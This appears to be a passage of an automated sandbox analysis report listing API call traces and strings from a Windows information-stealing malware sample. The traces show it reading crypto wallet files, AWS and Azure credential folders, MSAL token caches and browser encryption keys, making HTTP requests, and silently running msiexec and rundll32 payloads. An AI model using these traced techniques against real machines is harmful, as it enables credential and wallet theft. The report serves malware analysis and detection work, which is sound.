                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0091D0C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0091D0CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D208
                                        • lstrcat.KERNEL32(?,00931478), ref: 0091D217
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D22A
                                        • lstrcat.KERNEL32(?,0093147C), ref: 0091D239
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D24C
                                        • lstrcat.KERNEL32(?,00931480), ref: 0091D25B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D26E
                                        • lstrcat.KERNEL32(?,00931484), ref: 0091D27D
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D290
                                        • lstrcat.KERNEL32(?,00931488), ref: 0091D29F
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D2B2
                                        • lstrcat.KERNEL32(?,0093148C), ref: 0091D2C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091D2D4
                                        • lstrcat.KERNEL32(?,00931490), ref: 0091D2E3
                                          • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                                          • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                                        • lstrlen.KERNEL32(?), ref: 0091D32A
                                        • lstrlen.KERNEL32(?), ref: 0091D339
                                          • Part of subcall function 0092AA70: StrCmpCA.SHLWAPI(006B8F08,0091A7A7,?,0091A7A7,006B8F08), ref: 0092AA8F
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091D3B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: cd1201170ea637a319a6a567db78115cb39937a035e1c0b714056fc1dbb92a1a
                                        • Instruction ID: e625975592d2bb82614feec4c59a5a0d99e1038bb435898609380b20066e7982
                                        • Opcode Fuzzy Hash: cd1201170ea637a319a6a567db78115cb39937a035e1c0b714056fc1dbb92a1a
                                        • Instruction Fuzzy Hash: B2E1FD72910218ABCB04FBA0ED96FEE7379BF94301F104158F106B70A5DE35AE49CB66
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • RegOpenKeyExA.ADVAPI32(00000000,006BB188,00000000,00020019,00000000,009305B6), ref: 009283A4
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                                        • wsprintfA.USER32 ref: 00928459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?$@k
                                        • API String ID: 3246050789-1719912099
                                        • Opcode ID: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                                        • Instruction ID: a8df89ca92a4e5d2c8b96ac70b5115b0c6ed458a73fdc51eb5f1e5ba233a293c
                                        • Opcode Fuzzy Hash: 0b27d8ea26ce3a47819f88b8f0e2ccb541338862c1ec9d0ac29611fe53709176
                                        • Instruction Fuzzy Hash: F6812B72911228ABDB24DB50DC91FEAB7B8BF48700F0086D8E109A7184DF756F85CFA5
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006BD518,00000000,?,0093144C,00000000,?,?), ref: 0091CA6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0091CA89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0091CA95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0091CAA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0091CAD9
                                        • StrStrA.SHLWAPI(?,006BD548,00930B52), ref: 0091CAF7
                                        • StrStrA.SHLWAPI(00000000,006BD590), ref: 0091CB1E
                                        • StrStrA.SHLWAPI(?,006BDD20,00000000,?,00931458,00000000,?,00000000,00000000,?,006B8F68,00000000,?,00931454,00000000,?), ref: 0091CCA2
                                        • StrStrA.SHLWAPI(00000000,006BDD40), ref: 0091CCB9
                                          • Part of subcall function 0091C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091C871
                                          • Part of subcall function 0091C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091C87C
                                        • StrStrA.SHLWAPI(?,006BDD40,00000000,?,0093145C,00000000,?,00000000,006B9078), ref: 0091CD5A
                                        • StrStrA.SHLWAPI(00000000,006B92C8), ref: 0091CD71
                                          • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B46), ref: 0091C943
                                          • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B47), ref: 0091C957
                                          • Part of subcall function 0091C820: lstrcat.KERNEL32(?,00930B4E), ref: 0091C978
                                        • lstrlen.KERNEL32(00000000), ref: 0091CE44
                                        • CloseHandle.KERNEL32(00000000), ref: 0091CE9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: e576cdd84b2e053d46bcff442eb31ec9ad744eaafeea1362b617eb16408e6075
                                        • Instruction ID: 8ad7ebbe344ac91531bd72318b5a98a8f5341b0ba0860a68222d2974020e6067
                                        • Opcode Fuzzy Hash: e576cdd84b2e053d46bcff442eb31ec9ad744eaafeea1362b617eb16408e6075
                                        • Instruction Fuzzy Hash: F2E1F072900118ABDB14EBA4EC96FEEB778AF98300F404159F10677196DF306A4ACF65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID: (k$8k$@k
                                        • API String ID: 2001356338-1509224607
                                        • Opcode ID: 2402b351fc0e9737d7da2a04b0f82b2f1fa899e436317b491e54b8e52801d70a
                                        • Instruction ID: 58edad4922e2105c385b9ecdf9fcc64728f681879e697cd9d374f3d54c73baf7
                                        • Opcode Fuzzy Hash: 2402b351fc0e9737d7da2a04b0f82b2f1fa899e436317b491e54b8e52801d70a
                                        • Instruction Fuzzy Hash: D8C187B69012299BCB14EF60EC89FEE7379BFA4304F0045D8F50A67245DE74AA85CF91
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0092906C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: hk$image/jpeg
                                        • API String ID: 2244384528-222496248
                                        • Opcode ID: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                                        • Instruction ID: 7c36494abd805e67270bb53652853983376242324ad5822cb9e3a4ea1db48ec4
                                        • Opcode Fuzzy Hash: 999a6f1953ba03a95ec1f8cde153d5258f31fb10fa443db2c15b5e377a77356d
                                        • Instruction Fuzzy Hash: 2B71FC71A10208ABDB04DFE4DC89FEEB7B9BF88701F108648F615A7294DF74A945CB61
                                        APIs
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924DB0
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00924DCD
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                                          • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924E3C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00924E59
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                                          • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                                          • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924EC8
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00924EE5
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249B0
                                          • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,009308D2), ref: 009249C5
                                          • Part of subcall function 00924910: wsprintfA.USER32 ref: 009249E2
                                          • Part of subcall function 00924910: PathMatchSpecA.SHLWAPI(?,?), ref: 00924A1E
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,006BEAD8), ref: 00924A4A
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FF8), ref: 00924A5C
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A70
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,00930FFC), ref: 00924A82
                                          • Part of subcall function 00924910: lstrcat.KERNEL32(?,?), ref: 00924A96
                                          • Part of subcall function 00924910: CopyFileA.KERNEL32(?,?,00000001), ref: 00924AAC
                                          • Part of subcall function 00924910: DeleteFileA.KERNEL32(?), ref: 00924B31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 3f5bec3bc5d823f04a0f47214bc24ab34fbb62d420ddba71d3206ee9f88650e5
                                        • Instruction ID: 930a0d5a1f7b5e86638af0f35c3ceb276b399d1b912f8a1caebfb0350f2f9507
                                        • Opcode Fuzzy Hash: 3f5bec3bc5d823f04a0f47214bc24ab34fbb62d420ddba71d3206ee9f88650e5
                                        • Instruction Fuzzy Hash: 3641B5BAA4021867D714F760FC47FED3338ABA4704F004594B649660C1EEF56BC98F92
                                        APIs
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 009242EC
                                        • lstrcat.KERNEL32(?,006BE458), ref: 0092430B
                                        • lstrcat.KERNEL32(?,?), ref: 0092431F
                                        • lstrcat.KERNEL32(?,006BD4A0), ref: 00924333
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
                                          • Part of subcall function 00919CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 009293C0: GlobalAlloc.KERNEL32(00000000,009243DD,009243DD), ref: 009293D3
                                        • StrStrA.SHLWAPI(?,006BE1B8), ref: 009243F3
                                        • GlobalFree.KERNEL32(?), ref: 00924512
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                                          • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                                          • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                                        • lstrcat.KERNEL32(?,00000000), ref: 009244A3
                                        • StrCmpCA.SHLWAPI(?,009308D1), ref: 009244C0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009244D2
                                        • lstrcat.KERNEL32(00000000,?), ref: 009244E5
                                        • lstrcat.KERNEL32(00000000,00930FB8), ref: 009244F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID: Xk
                                        • API String ID: 3541710228-89453425
                                        • Opcode ID: 6095b2b461c906d9022810398e88d6c9fa0dfd8c355f7ed87d202b723309a735
                                        • Instruction ID: 4ac261751c416748afdb3716ce141501290d9199dd42d2168f4b430a35260306
                                        • Opcode Fuzzy Hash: 6095b2b461c906d9022810398e88d6c9fa0dfd8c355f7ed87d202b723309a735
                                        • Instruction Fuzzy Hash: 7D715676900218ABDB14EBA0EC95FEE777DAF88300F004598F605A7185EE75EB49CF91
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009231C5
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0092335D
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 009234EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                                        • Instruction ID: b4ab002048f3a420275d93faced2fea864aee9aeaf85ccae5f6b183e598b69d0
                                        • Opcode Fuzzy Hash: 7cb5dad48cb6b226da8ca1fbb33aa81e433d3d345da4cb9cb50ad4cace2b86d8
                                        • Instruction Fuzzy Hash: 311213728001289BDB19FBA0EC92FDEB738AF94300F504559F5067619AEF342B4ACF56
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                                          • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916303
                                          • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                                          • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,006BE230,00000000,00000000,00400100,00000000), ref: 00916385
                                          • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                                          • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
